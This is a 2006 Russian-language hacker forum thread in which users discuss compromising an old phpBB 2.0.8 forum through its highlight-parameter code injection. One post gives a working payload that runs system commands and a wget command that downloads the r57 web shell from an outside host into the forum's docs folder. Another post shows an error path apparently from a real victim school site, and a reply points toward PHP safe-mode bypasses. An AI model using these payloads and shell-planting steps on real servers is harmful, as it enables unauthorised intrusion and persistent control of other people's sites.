Куда залить шелл?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Куда залить шелл? - 2006-02-02 23:11:50
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Наткнулся на бажный форум старой версии (2.0.8) Попробовал узнать где находится wget таким вот запросом: &highlight=%2527.$poster=''$herase''.%2527&herase=which wget Оказалось, что он в /usr/bin/wget )\b#i, но нужна директория открытая для записи, я запросил: find ./type d -perm 0777 -ls, но ничего не изменилось т.е осталось /usr/bin/wget )\b#i Это значит, что нет свободной что ли???
|
|
|
Куда залить шелл? - 2006-02-03 00:05:40
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
Когда я взламываю phpBB таких версий делаю так: запрос &highlight=%2527.system($_GET[c]).%2527&c=id потом which wget, далее ls -la, смотрю куда можно залить шелл и пишу: wget -O docs/about.php http://your_site.narod.ru/r57shell.php
Вроде всё легко и понятно![sm=2.gif]
|
|
|
Куда залить шелл? - 2006-02-03 16:30:00
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
quote:
—————-<BR>Цитата: Дата:03.02.2006 0:05:40, Автор:DeXN :: Когда я взламываю phpBB таких версий делаю так:<BR><BR>запрос &amp;amp;highlight=%2527.system($_GET[c]).%2527&amp;amp;c=id<BR><BR>потом which wget, далее ls -la, смотрю куда можно залить шелл и пишу: <BR><BR>wget -O docs/about.php http://your_site.narod.ru/r57shell.php<BR><BR><BR>Вроде всё легко и понятно![sm=2.gif] —————-
Дело в том что такой страницы: &highlight=%2527.system($_GET[c]).%2527&c=id (в моем случае) не существует
|
|
|
Куда залить шелл? - 2006-02-04 17:57:23
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /hsphere/local/home/burdinar/school.burdina.ru/forum/viewtopic.php(1104) : regexp code on line 1
Че это значит?
|
|
|
Куда залить шелл? - 2006-02-04 18:24:51
|
|
|
MrBlack
Сообщений: 268
Оценки: 0
Присоединился: 2004-05-24 00:02:27
|
quote:
—————-<BR>Цитата: Дата:04.02.2006 17:57:23, Автор:Benzin :: Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /hsphere/local/home/burdinar/school.burdina.ru/forum/viewtopic.php(1104) : regexp code on line 1<BR><BR><BR>Че это значит? —————-
А то и значит, что ты в safe mode. Всё ж сам написал [sm=9.gif] Ищи статьи про обход safe mode в php
|
|
|
|
|